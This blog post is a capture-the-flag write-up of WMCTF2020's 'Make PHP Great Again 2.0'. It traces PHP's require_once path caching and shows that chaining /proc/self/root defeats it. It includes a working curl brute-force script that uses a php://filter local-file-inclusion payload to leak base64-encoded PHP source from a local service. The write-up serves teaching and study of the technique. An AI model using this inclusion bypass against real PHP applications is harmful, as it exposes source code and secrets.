Title: Solution to WMCTF2020's Make PHP Great Again 2.0, or how to use filters with `require_once`
Date: 2024-04-15 13:00

I'm a huge fan of Asian CTF web challenges,
since they're usually self-contained, elegant and excessively <del>cursed</del> interesting. This one,
Make PHP Great Again 2.0, is from [WMCTF 2020](https://ctftime.org/event/1094):

```php
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}
```

The obvious way would be to make use of
[`PHP_SESSION_UPLOAD_PROGRESS`](https://php.net/manual/en/session.upload-progress.php)
to plant a payload in a session file whose name we control via `PHPSESSID`,
then include that session file to get a shell. If you
have a way to make PHP segfault in the process so that it doesn't remove the
temporary file, even better, but that's not required.
This technique was the [expected solution](https://blog.orange.tw/2018/10/) to HITCON 2018 CTF's [One Line PHP
Challenge](https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2018/one-line-php-challenge),
also written by [Orange](https://blog.orange.tw/), based on a 2016 [bug report](https://bugs.php.net/bug.php?id=72681) from
taoguangchen. But what if the filesystem is completely read-only, or in a chroot,
or running on PHP without session support?

The other possible avenue is to use stream wrappers, something like
`php://filter/convert.base64-encode/resource=flag.php`, but since `flag.php`
has already been included once, we can't include it a second time. Or can we?
Well, odds are that we can, since I've [been told](https://twitter.com/paypayp4y/status/1679299009691947008)
that this was the expected solution.

To make `require_once` work, PHP needs some kind of cache. Let's create `flag.php`, and try to include it
via two different paths, to see what happens:

```console
$ cat <<'EOF' >|flag.php
<?php
$flag='FLAG{lol}';
EOF
$ strace -f  -- php -r 'include_once "flag.php"; include_once "flag.php";' 2>&1  | grep flag.php
execve("/usr/bin/php", ["php", "-r", "include_once \"flag.php\"; include"...], 0xffffc8f45200 /* 59 vars */) = 0
newfstatat(AT_FDCWD, "/home/jvoisin/./flag.php", {st_mode=S_IFREG|0644, st_size=7, ...}, AT_SYMLINK_NOFOLLOW) = 0
newfstatat(AT_FDCWD, "/home/jvoisin/flag.php", {st_mode=S_IFREG|0644, st_size=7, ...}, AT_SYMLINK_NOFOLLOW) = 0
openat(AT_FDCWD, "/home/jvoisin/flag.php", O_RDONLY) = 3
$ strace -f  -- php -r 'include_once "flag.php"; include_once "/home/jvoisin/flag.php";' 2>&1  | grep flag.php
execve("/usr/bin/php", ["php", "-r", "include_once \"flag.php\"; include"...], 0xffffe2c25e40 /* 59 vars */) = 0
newfstatat(AT_FDCWD, "/home/jvoisin/./flag.php", {st_mode=S_IFREG|0644, st_size=7, ...}, AT_SYMLINK_NOFOLLOW) = 0
newfstatat(AT_FDCWD, "/home/jvoisin/flag.php", {st_mode=S_IFREG|0644, st_size=7, ...}, AT_SYMLINK_NOFOLLOW) = 0
openat(AT_FDCWD, "/home/jvoisin/flag.php", O_RDONLY) = 3
$
```

In both cases the file is opened only once, under the same `/home/jvoisin/flag.php` path:
as expected, there is some kind of path normalization going on.
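To make that normalization tangible outside of PHP, here is a small sketch using coreutils' `realpath` as a stand-in for PHP's resolver. That is an assumption made for the demo: PHP doesn't call this binary. The scratch directory and the `canonical` helper are made up too. The only point is that several spellings of a path collapse into a single string, which is what a `*_once` cache would use as its key.

```bash
# Stand-in for PHP's resolver: coreutils' realpath (assumption, not PHP's code).
canonical() { realpath -- "$1"; }

# Scratch directory holding a dummy flag.php (hypothetical layout).
tmp=$(mktemp -d)
printf '<?php\n' > "$tmp/flag.php"

# Three spellings of the same file.
relative=$(cd "$tmp" && canonical ./flag.php)
absolute=$(canonical "$tmp/flag.php")
dotdot=$(canonical "$tmp/../$(basename "$tmp")/flag.php")

# Count the distinct canonical paths: a single one means a single cache key.
printf '%s\n' "$relative" "$absolute" "$dotdot" | sort -u | wc -l
rm -rf "$tmp"
```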

```console
$ ltrace -n 1  -s 1337 -f -x '@php' php -r 'include_once "flag.php"; include_once "/home/jvoisin/../jvoisin/flag.php";' 2>out.txt
$ less out.txt
[…] // search for `flag.php`
[pid 210076]       zend_stream_init_filename_ex(0xffffc734f208, 0xffff82a5c3c0, 104, 33)                                                                      = 0xffffc734f208
[pid 210076]       zend_stream_open(0xffffc734f208, 0xffff82a5c3c0, 2, 33 <unfinished ...>
[pid 210076]        php_stream_open_for_zend_ex(0xffffc734f208, 137, 0xaaab689b8ab0, 0 <unfinished ...>
[pid 210076]         _php_stream_open_wrapper_ex(0xffff82a5c3d8, 0xaaab68b363c8, 0x10089, 0xffffc734f1d0 <unfinished ...>
[pid 210076]          zend_is_executing(0xffff82a5c3d8, 22, 0, 0xffff83943b40)                                                                                = 1
[pid 210076]          php_resolve_path(0xffff82a5c3d8, 22, 0xaaab80b07648, 0xffff83943b40 <unfinished ...>
[pid 210076]           strlen("/home/jvoisin/flag.php")                                                                                                       = 22
[pid 210076]           __ctype_b_loc()                                                                                                                        = 0xffff838ffcf8
[pid 210076]           tsrm_realpath(0xffff82a5c3d8, 0, 0, 0xffff82a5c420 <unfinished ...>
[…]
```

PHP has its very own implementation of `realpath`. Given how complex this
can be, especially in a multiplatform app, odds are that there are bugs lurking
there. Keep in mind that we're tracing compiled code, so a fair
share of PHP's spaghetti implementation is inlined. Time to read PHP's code now, yay.

Looking at [`zend_include_or_eval`](https://github.com/php/php-src/blob/cf313321c2e13319d479e0dd4f49094cc72cf652/Zend/zend_execute.c#L4873C55-L4873C75):

```C
static zend_never_inline zend_op_array* ZEND_FASTCALL zend_include_or_eval(zval *inc_filename_zv, int type) /* {{{ */
{
	zend_op_array *new_op_array = NULL;
	zend_string *tmp_inc_filename;
	zend_string *inc_filename = zval_try_get_tmp_string(inc_filename_zv, &tmp_inc_filename);
	if (UNEXPECTED(!inc_filename)) {
		return NULL;
	}

	switch (type) {
		case ZEND_INCLUDE_ONCE:
		case ZEND_REQUIRE_ONCE: {
				zend_file_handle file_handle;
				zend_string *resolved_path;

				resolved_path = zend_resolve_path(inc_filename);  // returns NULL for wrappers other than `file://`
				if (EXPECTED(resolved_path)) {
					if (zend_hash_exists(&EG(included_files), resolved_path)) {
						new_op_array = ZEND_FAKE_OP_ARRAY;
						zend_string_release_ex(resolved_path, 0);
						break;
					}
				} else if (UNEXPECTED(EG(exception))) {
					break;
				} else if (UNEXPECTED(strlen(ZSTR_VAL(inc_filename)) != ZSTR_LEN(inc_filename))) {
					zend_message_dispatcher(
						(type == ZEND_INCLUDE_ONCE) ?
							ZMSG_FAILED_INCLUDE_FOPEN : ZMSG_FAILED_REQUIRE_FOPEN,
							ZSTR_VAL(inc_filename));
					break;
				} else {
					resolved_path = zend_string_copy(inc_filename);  // So we get there
				}

				zend_stream_init_filename_ex(&file_handle, resolved_path);
				if (SUCCESS == zend_stream_open(&file_handle)) {

					if (!file_handle.opened_path) {
						file_handle.opened_path = zend_string_copy(resolved_path);  // We need to go here
					}

					if (zend_hash_add_empty_element(&EG(included_files), file_handle.opened_path)) {
						new_op_array = zend_compile_file(&file_handle, (type==ZEND_INCLUDE_ONCE?ZEND_INCLUDE:ZEND_REQUIRE));
					} else {
						new_op_array = ZEND_FAKE_OP_ARRAY;
					}
				} else if (!EG(exception)) {
					zend_message_dispatcher(
						(type == ZEND_INCLUDE_ONCE) ?
							ZMSG_FAILED_INCLUDE_FOPEN : ZMSG_FAILED_REQUIRE_FOPEN,
							ZSTR_VAL(inc_filename));
				}
				zend_destroy_file_handle(&file_handle);
				zend_string_release_ex(resolved_path, 0);
			}
			break;
```

If we can find a way to make `zend_stream_open` return `SUCCESS` while not setting `file_handle.opened_path`, we can include the same file twice. Let's look at the call-stack from there:
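To convince myself of that reading, here is a toy shell model of the `*_once` branch above. It only mirrors the control flow of the excerpt: `resolve_path`, the `unresolvable:` prefix, the `/srv` directory and the second argument standing for `opened_path` are all hypothetical stand-ins, not PHP's real behaviour.

```bash
# Toy model of the *_once branch of zend_include_or_eval shown above.
# Everything here is a stand-in; none of it is PHP's real code.
included_files=""   # newline-separated keys, plays the role of EG(included_files)
outcome=""

# Hypothetical resolver: fails on names starting with "unresolvable:",
# otherwise pretends that every file lives in /srv.
resolve_path() {
  case "$1" in
    unresolvable:*) return 1 ;;
    *) printf '/srv/%s' "${1##*/}" ;;
  esac
}

already_included() {
  printf '%s\n' "$included_files" | grep -Fxq -- "$1"
}

# $1: name passed to include_once
# $2: opened_path set by the (hypothetical) opener, empty if it sets none
include_once_model() {
  name=$1
  opened=${2-}
  if resolved=$(resolve_path "$name"); then
    if already_included "$resolved"; then
      outcome=skipped
      return
    fi
  else
    resolved=$name                 # fall back to the raw string
  fi
  key=${opened:-$resolved}         # opened_path wins when it is set
  if already_included "$key"; then
    outcome=skipped
  else
    included_files=$(printf '%s\n%s' "$included_files" "$key")
    outcome=compiled
  fi
}

include_once_model flag.php /srv/flag.php
echo "plain name:                 $outcome"
include_once_model ./flag.php /srv/flag.php
echo "other spelling:             $outcome"
include_once_model unresolvable:/srv/flag.php
echo "unresolved, no opened_path: $outcome"
include_once_model unresolvable:/tmp/flag.php /srv/flag.php
echo "unresolved, opened_path:    $outcome"
```

In this model the four calls end up as compiled, skipped, compiled, skipped: the second inclusion only goes through when the resolver fails *and* the opener leaves `opened_path` empty, since the raw string then becomes a brand new key.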

```C
zend_include_or_eval
    zend_stream_open
         php_stream_open_for_zend (via zend_stream_open_function = utility_functions->stream_open_function, via utility_functions->stream_open_function = php_stream_open_for_zend)
            php_stream_open_for_zend_ex(handle, USE_PATH|REPORT_ERRORS|STREAM_OPEN_FOR_INCLUDE);
                 php_stream_open_wrapper((char *)ZSTR_VAL(filename), "rb", mode | STREAM_OPEN_FOR_ZEND_STREAM, &opened_path)
                    _php_stream_open_wrapper_ex((path), (mode), (options), (opened), NULL STREAMS_CC)
                        php_resolve_path(path, strlen(path), PG(include_path)) // doesn't resolve for wrappers other than `file://`
                        stream = wrapper->wops->stream_opener(wrapper, path_to_open, mode, options & ~REPORT_ERRORS, opened_path, context STREAMS_REL_CC);  // use gdb to resolve this
                            php_stream_fopen(filename, mode, opened)
                                _php_stream_fopen((filename), (mode), (opened), 0 STREAMS_CC)
                                    expand_filepath(filename, realpath)
                                        expand_filepath_ex(filepath, real_path, NULL, 0)
                                             expand_filepath_with_mode(filepath, real_path, relative_to, relative_to_len, CWD_FILEPATH)
                                                 virtual_file_ex(&new_state, filepath, NULL, realpath_mode)
                                                    tsrm_realpath_r(path, start, i-1, ll, t, use_realpath, 1, NULL)
                                                        php_sys_lstat(path, &st)
                                                            lstat
                                                        tsrm_realpath_r(path, 1, j, ll, t, use_realpath, is_dir, &directory)
                                                        tsrm_realpath_r(path, start, i + j, ll, t, use_realpath, is_dir, &directory)
                                                        tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL)
```

`tsrm_realpath_r` looks horribly complicated, dreadful and vile, calling itself
recursively multiple times, with some global state in the mix. In our case,
the two interesting parts are the following:

```C
static size_t tsrm_realpath_r(char *path, size_t start, size_t len, int *ll, time_t *t, int use_realpath, bool is_dir, int *link_is_dir) /* {{{ */
{
        // […]
        if (save && php_sys_lstat(path, &st) < 0) {
            if (use_realpath == CWD_REALPATH) {
                /* file not found */
                return (size_t)-1;
            }
            /* continue resolution anyway but don't save result in the cache */
            save = 0;
        }
        // […]
                        j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL);
}
```

Looking at `lstat`'s [manpage](https://linux.die.net/man/2/lstat), if the path
goes through [too many symlinks](https://github.com/bminor/glibc/blob/ae7468a7b0bcf22e9cd5fcae42bb9e4f65de83ee/sysdeps/generic/eloop-threshold.h#L46),
it'll fail with `ELOOP`. As usual with filesystem trickery, `/proc` has
everything one needs, in our case `/proc/self/root`, a symlink to `/`, so we can
throw something like `/proc/self/root/proc/self/root/…` at `lstat` to force it to
return `-1` should we be so inclined.
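This is easy to poke at from a shell, without PHP in the picture. The sketch below assumes a Linux box with `/proc` mounted, and relies on `stat(1)` not following the final path component when called without `-L`, like `lstat(2)`. The `chain` helper and the chain lengths are arbitrary picks of mine.

```bash
# Print /proc/self/root repeated $1 times.
chain() {
  n=$1
  out=""
  while [ "$n" -gt 0 ]; do
    out="$out/proc/self/root"
    n=$((n - 1))
  done
  printf '%s' "$out"
}

# Probe a few chain lengths; the last component is itself a symlink.
for count in 1 10 50; do
  if stat -- "$(chain "$count")/proc/self/root" >/dev/null 2>&1; then
    echo "$count: lstat succeeded"
  else
    echo "$count: lstat failed"
  fi
done
```

On Linux I'd expect the short chains to go through and the 50-deep one to fail, but the exact threshold is the kernel's business. Without `/proc`, every probe simply fails.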

The 2<sup>nd</sup> part is finding a way to make `use_realpath` different from
`CWD_REALPATH` to avoid returning an error, likely messing with PHP's path cache.

I started to write some ghetto-tracing via GDB:

```gdb
# echo '<?php echo "FLAG{lol}";' > ~/flag.php
# gdb `which php` --batch --command=trace.gs -iex 'set debuginfod enabled on' -q
set debuginfod enabled on

break tsrm_realpath_r
commands 1
        silent
        printf "path: %s\n", path
        printf "use_realpath: %d\n", use_realpath
        continue
end

set $link="/proc/self/root"
set $inc = "/home/jvoisin/flag.php"
set $idx=0
while($idx < 50)
        eval "set $inc = \"%s%s\"", $link, $inc
        eval "set args \"-r\" \"include_once 'flag.php'; include_once '%s';\"", $inc
        printf "Number of repetitions: %d", $idx
        run
        set $idx=$idx+1
end
```

But GDB is definitely too brittle and buggy to do anything like this, and the
[Linux version of x64dbg](https://linux.x64dbg.com) isn't there yet, so I
settled for CTF-grade bash-powered bruteforcing instead of trying to understand what's going on,
adding an exciting human touch (in the form of pure laziness) to this cold
engineering mystery-solving blogpost.

```bash
$ cat bruteforce.sh
for i in {1..50}; do
  inc=$(seq $i | awk '{printf "/proc/self/root"}')
  echo $inc;
  args=$(printf 'include_once \"flag.php\"; include_once \"%s/home/jvoisin/flag.php\";' $inc)
  echo $args
  php -r "$args"
  echo
done
$ bash bruteforce.sh
/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}

/proc/self/root/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}

/proc/self/root/proc/self/root/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/proc/self/root/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}

/proc/self/root/proc/self/root/proc/self/root/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}

//[…]

/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}
FLAG{lol}

// […]
$
```

Looks like we can indeed confuse PHP about what was already included or
not. Rinse and repeat against the service to get the flag:

```bash
$ cat ./bruteforce.sh
for i in {15..50}; do
  inc=$(seq $i | awk '{printf "/proc/self/root"}')/proc/self/cwd/flag.php
  echo $i
  curl -s localhost:8080?file=php://filter/convert.base64-encode/resource=$inc | grep $(echo '<?php' | base64 -| head -c 3)
done
$ bash ./bruteforce.sh
15
16
17
18
19
20
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
21
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
22
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
23
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
24
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
25
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
26
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
27
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
28
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
29
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
30
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
31
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
32
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
33
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
34
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
35
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
36
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
37
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
38
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
39
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
40
41
42
43
44
45
46
47
48
49
50
$ echo PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg== | base64 -d
<?php
$flag="FLAG{lol}";
?>
$
```
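In case the `grep` in that loop looks cryptic: its pattern is just the first three base64 characters of `<?php`, which is enough to spot a leaked PHP file in the response. A minimal sketch of the same trick, where `line` is a copy of one of the response lines printed above and the variable names are mine:

```bash
# First three base64 characters of "<?php\n", as computed in the loop above.
marker=$(echo '<?php' | base64 | head -c 3)
echo "$marker"

# One response line, copied from the output above.
line='</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg=='

# Drop everything up to and including the marker, then glue the marker back
# to recover the bare base64 blob and decode it.
payload=${line#*"$marker"}
printf '%s%s\n' "$marker" "$payload" | base64 -d
```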

Now, I have no clue why this works when passing anything between 21 and 40
symbolic links (the 20 to 39 repetitions of `/proc/self/root` above, plus the
trailing `/proc/self/cwd`), and life is way too short to properly instrument/trace PHP and
try to make sense of the results to properly understand what's going on.
